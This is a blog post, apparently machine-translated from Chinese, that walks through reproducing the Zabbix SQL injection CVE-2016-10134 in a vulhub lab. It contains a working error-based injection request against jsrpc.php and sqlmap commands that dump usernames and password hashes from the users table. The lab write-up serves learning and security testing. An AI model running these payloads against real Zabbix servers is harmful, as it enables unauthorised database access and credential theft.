Preface

A few days ago, a little friend asked me to repeat this loophole , It can't be said to be repeated , The database cannot read , It's strange . So while I have this time today , Just do it , Take notes by the way .

Tips ： The following is the main body of this article , The following cases can be used for reference

One 、 Introduction to loopholes

zabbix What is it? ？

zabbix Is a server monitoring software , The reason is server、agent、web And so on , among web Module by PHP To write , Used to display the results in the database .

Vulnerability environment

stay vulhub The range is reproduced , start-up zabbix 3.0.3.

Two 、 Repeat step

1. Start the vulnerability environment

Get into zabbix Catalog ,cd Get into CVE-2016-10134 Catalog , Enter the following command to start the range ：

docker-compose up -d

After executing the command , Will start the database （mysql）、zabbix server、zabbix agent 、zabbix web. If the memory is a little small , There may be a situation where a container hangs up .
When all services are displayed done, To successfully visit ：

After startup , Wait a moment , visit http://your-ip/8080, Successfully visited zabbix Interface .

2.sql Inject

zabbix Of jsrpc.php Page exists sql Loophole , So by visiting this jsrpc.php Page to trigger the vulnerability , Vulnerability parameter is profileIdx2. Send the following request package to execute sql command , Get database information .
The request package information is as follows ：

GET /jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0) 
HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: zbx_sessionid=7689b1e30e63d9726fa86010d3c6592c; PHPSESSID=3r69f0snsemtpmkeiocgg9blj2
Upgrade-Insecure-Requests: 1

Successfully executed user() command , And return the information .
speak user() Modified into database(), Try to get the database name ：

http://your-ip:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,database()),0)

If you are lazy, you can also use tools directly sqlmap, Everything came out after running , No experience ：

sqlmap -u "http://192.168.25.130:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=1"

The user name and password are also fixed directly ：

sqlmap -u "http://192.168.25.130:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=1" -D zabbix -T users -C name,passwd --dump

summary

It is an ordinary injection recurrence , There's no bypass , No difficulty .

     Original article , Welcome to reprint , Please indicate the source of the article ： 【Vulhub shooting range 】zabbix-SQL Inject (CVE-2016-10134) Loophole recurrence . Baidu and all kinds of collection stations are not credible , Search carefully to identify . Technical articles generally have timeliness , I am used to revise and update my blog posts from time to time , So visit the source to see the latest version of this article .